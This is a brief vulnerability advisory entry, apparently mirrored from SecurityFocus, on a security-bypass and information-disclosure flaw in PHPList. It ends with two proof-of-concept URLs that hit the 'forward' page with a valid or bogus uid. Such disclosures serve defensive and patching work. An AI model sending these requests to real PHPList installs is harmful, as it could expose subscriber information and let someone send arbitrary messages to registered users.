8 lines
No EOL
427 B
Text
8 lines
No EOL
427 B
Text
source: https://www.securityfocus.com/bid/49188/info
|
|
|
|
PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability.
|
|
|
|
An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible.
|
|
|
|
http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID
|
|
http://www.example.com/lists/?p=forward&uid=foo&mid=ID |